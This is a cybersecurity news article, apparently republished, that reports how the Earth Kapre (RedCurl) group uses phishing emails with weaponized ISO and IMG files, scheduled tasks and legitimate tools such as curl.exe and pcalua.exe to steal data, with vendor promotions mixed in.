Hackers Using Weaponized ISO & IMG Files to Attack Organizations


The notorious hacking group known as Earth Kapre, also referred to as RedCurl and Red Wolf, has been targeting organizations across the globe with weaponized ISO and IMG files.

This comprehensive investigation reveals the intricate tactics employed by the group to infiltrate networks, evade detection, and exfiltrate sensitive data.

Earth Kapre’s operations have spanned across Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the United States.

The group initiates its attack through phishing emails containing malicious attachments in the form of .iso and .img files.

Once unsuspecting recipients open these files, the malware establishes a foothold in the system, setting the stage for data theft and espionage.

Document

Integrate ANY.RUN in your company for Effective Malware Analysis

Malware analysis can be fast and simple. Just let us show you the way to:

  • Interact with malware safely
  • Set up virtual machine in Linux and all Windows OS versions
  • Work in a team
  • Get detailed reports with maximum data
  • If you want to test all these features now with completely free access to the sandbox:

Malicious Attachments

Upon execution, these attachments trigger the creation of a scheduled task for persistence, ensuring the malware remains active within the compromised system.

Suspicious execution of scheduled tasks
Suspicious execution of scheduled tasks

This technique facilitates the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers operated by the attackers.

MDR Investigation

The Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted a thorough investigation into an incident involving numerous machines infected by the Earth Kapre downloader.

This malware was observed establishing connections with its C&C servers, hinting at a potential data theft scenario.

The investigation uncovered the use of legitimate tools such as Powershell.exe and curl.exe to download further malicious payloads, showcasing Earth Kapre’s sophisticated evasion techniques.

In a cunning move to blend into the network and evade detection, Earth Kapre exploited the Program Compatibility Assistant (pcalua.exe) to execute malicious command lines.

This approach allowed the group to operate under the radar, leveraging the trust associated with legitimate system tools to carry out their nefarious activities.

Data Theft Scenario

The investigation revealed a complex data theft scenario orchestrated by Earth Kapre.

The group employed a Python script to establish outbound communication and execute remote commands, indicating the use of the Impacket library for Windows network protocol interactions.

This activity points to a well-coordinated effort to exfiltrate data from the compromised organization.

Trend Vision One™ Execution Profile showing the downloaded Earth Kapre loader using “curl.exe”.
Trend Vision One™ Execution Profile showing the downloaded Earth Kapre loader using “curl.exe”.

The Earth Kapre hacking group’s latest campaign underscores the ongoing and active threat posed by sophisticated cyber espionage actors.

Earth Kapre attack chain
Earth Kapre attack chain

By leveraging phishing emails with weaponized ISO and IMG files, the group has demonstrated its capability to infiltrate a wide range of organizations globally.

The use of legitimate tools for malicious purposes further highlights the group’s ingenuity in evading detection and achieving its objectives.

Organizations are urged to remain vigilant and employ advanced threat detection and response solutions to counter such sophisticated threats effectively.

You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.





Source link